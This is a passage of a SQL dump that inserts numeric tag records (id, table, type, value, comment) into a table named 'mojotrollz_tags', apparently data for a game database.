`mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (174940, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (174941, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (174942, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (174943, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (174944, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (174945, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (174954, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (174955, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (174956, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (174957, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (174958, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (174959, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (174960, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (174961, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (174962, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (174963, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (174964, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (174965, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (174966, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (174967, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (174994, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (174995, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (174996, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (174997, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (174998, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175075, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175076, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175078, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175084, 2, 1, 90, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175084, 2, 2, 133, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175085, 2, 1, 90, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175085, 2, 2, 133, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175104, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175124, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175144, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175145, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175146, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175148, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175149, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175150, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175151, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175153, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175165, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175166, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175167, 2, 1, 289, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175179, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175180, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175181, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175185, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175186, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175187, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175194, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175195, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175196, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175197, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175198, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175199, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175200, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175207, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175226, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175227, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175230, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175233, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175244, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175245, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175246, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175247, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175248, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175249, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175265, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175266, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175267, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175268, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175269, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175270, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175271, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175272, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175284, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175285, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175286, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175287, 2, 1, 389, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175287, 2, 2, 2437, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175287, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175287, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175288, 2, 1, 389, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175288, 2, 2, 2437, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175288, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175288, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175289, 2, 1, 389, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175289, 2, 2, 2437, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175289, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175289, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175290, 2, 1, 389, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175290, 2, 2, 2437, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175290, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175290, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175291, 2, 1, 389, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175291, 2, 2, 2437, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175291, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175291, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175292, 2, 1, 389, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175292, 2, 2, 2437, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175292, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175292, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175293, 2, 1, 389, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175293, 2, 2, 2437, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175293, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175293, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175294, 2, 1, 389, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175294, 2, 2, 2437, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175294, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175294, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175298, 2, 1, 389, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175298, 2, 2, 2437, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175298, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175298, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175305, 2, 1, 389, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175305, 2, 2, 2437, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175305, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175305, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175307, 2, 1, 389, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175307, 2, 2, 2437, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175307, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175307, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175308, 2, 1, 389, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175308, 2, 2, 2437, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175308, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175308, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175310, 2, 1, 389, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175310, 2, 2, 2437, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175310, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175310, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175312, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175313, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175314, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175315, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175316, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175317, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175318, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175319, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175320, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175324, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175329, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175330, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175331, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175334, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175335, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175350, 2, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175350, 2, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175350, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175350, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175351, 2, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175351, 2, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175351, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175351, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175352, 2, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175352, 2, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175352, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175352, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175353, 2, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175353, 2, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175353, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175353, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175354, 2, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175354, 2, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175354, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175354, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175355, 2, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175355, 2, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175355, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175355, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175356, 2, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175356, 2, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175356, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175356, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175357, 2, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175357, 2, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175357, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175357, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175358, 2, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175358, 2, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175358, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175358, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175359, 2, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175359, 2, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175359, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175359, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175368, 2, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175368, 2, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175368, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175368, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175369, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175370, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175372, 2, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175372, 2, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175372, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175372, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175373, 2, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175373, 2, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175373, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175373, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175374, 2, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175374, 2, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175374, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175374, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175375, 2, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175375, 2, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175375, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175375, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175376, 2, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175376, 2, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175376, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175376, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175377, 2, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175377, 2, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175377, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175377, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175379, 2, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175379, 2, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175379, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175379, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175380, 2, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175380, 2, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175380, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175380, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175381, 2, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175381, 2, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175381, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175381, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175382, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175383, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175384, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175385, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175404, 2, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175404, 2, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175404, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175404, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175405, 2, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175405, 2, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175405, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175405, 2, 10, 1, NULL); 